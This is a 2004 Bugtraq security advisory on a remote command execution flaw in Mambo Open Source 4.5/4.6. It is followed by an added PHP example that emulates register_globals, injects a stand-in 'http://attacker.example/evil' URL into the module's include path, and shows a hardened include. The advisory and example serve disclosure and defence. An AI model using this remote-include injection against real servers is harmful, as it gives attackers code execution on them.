Message-ID: <000901c3dde9$80d11390$0202a8c0@angie>
Date: Sun, 18 Jan 2004 18:21:15 +0100
From: "FraMe" <frame@...palab.com>
To: <bugtraq@...urityfocus.com>
Subject: Mambo OS v4.5/v4.6: remote command execution


Product: Mambo Open Source v4.5
              Mambo Open Source v4.6 (CVS)
Vendor: Miro International Pty Ltd.
Author: FraMe ( frame at kernelpanik.org )
URL: http://www.kernelpanik.org

CONTENTS

1. Overview
2. Description
3. Details
4. Patches

1. Overview.

Mambo Open Source is an open-source, modular web content management
system (CMS), written in PHP with a MySQL database as the backend.

More info: http://www.mamboserver.com

2. Description.

Mambo OS allows remote command execution in ./modules/mod_mainmenu.php.
Anybody can inject a URL into $mosConfig_absolute_path and obtain command
execution with web server privileges (usually nobody).

3. Details.

Mambo OS v4.5 and v4.6
from ./modules/mod_mainmenu.php:
================================

<?php

(..)

// $module is defined in the calling function
// $params is defined in the calling function

// $mosConfig_absolute_path is used as the base of an include path; with
// register_globals on it can be supplied in the HTTP request
require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

(..)
?>


4. Patches.

a) PHP register_globals off (default in PHP > 4.2)

b) Unofficial patch for mod_mainmenu.php can be downloaded from:
     http://www.kernelpanik.org/code/kernelpanik/mambo.zip

==============================
[ FraMe - frame at kernelpanik.org ]
[ URL - http://frame.lifefromthenet.com ]
[ Kernelpanik - http://www.kernelpanik.org ]
[ PGP KeyID - 0xFA81AC9C ]
==============================
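The following is an added illustration, not code from the advisory or from the Mambo project. It emulates what register_globals did to the quoted require_once line, using a constructed request whose attacker host (attacker.example) is an assumption, and shows one hardened form alongside it. The marker constant _VALID_MOS and the helper names are assumptions for the example; the hardened variant derives the include base from the file's own location instead of from a variable a request could populate, which is the property the vulnerable line lacks.

```php
<?php
// Added example, not the advisory's or the vendor's code.
// Attacker host, helper names and the _VALID_MOS marker are assumptions.

// register_globals=On turned every request variable into a global PHP
// variable before the script ran. extract() over a constructed request
// reproduces that effect so the example runs offline.
$constructed_get = array(                      // constructed sample request
    'mosConfig_absolute_path' => 'http://attacker.example/evil',
);
extract($constructed_get);   // $mosConfig_absolute_path is now attacker-chosen

// Vulnerable pattern: same shape as the line quoted in the advisory.
// With allow_url_fopen enabled, require_once() on an http:// path fetches
// the remote file and executes it as PHP. This helper only builds the
// string so nothing is fetched when the example is run.
function vulnerable_include_target($base)
{
    return "$base/modules/mod_mainmenu.class.php";
}

// Hardened form (assumed, not the vendor's patch):
// 1. refuse direct calls: the framework's front controller must define a
//    marker before any module file is loaded;
// 2. build the base path from __FILE__, never from a variable that
//    register_globals (or a later extract) could have populated.
function safe_include_target()
{
    if (!defined('_VALID_MOS')) {
        die('Direct access to this file is not allowed.');
    }
    $base = dirname(__FILE__);           // directory of this script
    return $base . '/mod_mainmenu.class.php';
}

echo "Vulnerable line would include: "
   . vulnerable_include_target($mosConfig_absolute_path) . "\n";

define('_VALID_MOS', 1);   // what the front controller does before loading modules
echo "Hardened line would include: " . safe_include_target() . "\n";
```

Running this with php prints a remote http:// include target for the vulnerable variant and a local path under the script's own directory for the hardened one; the advisory's patch a) (register_globals off) removes the extract() step entirely, which is why it closes the hole without changing the module.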

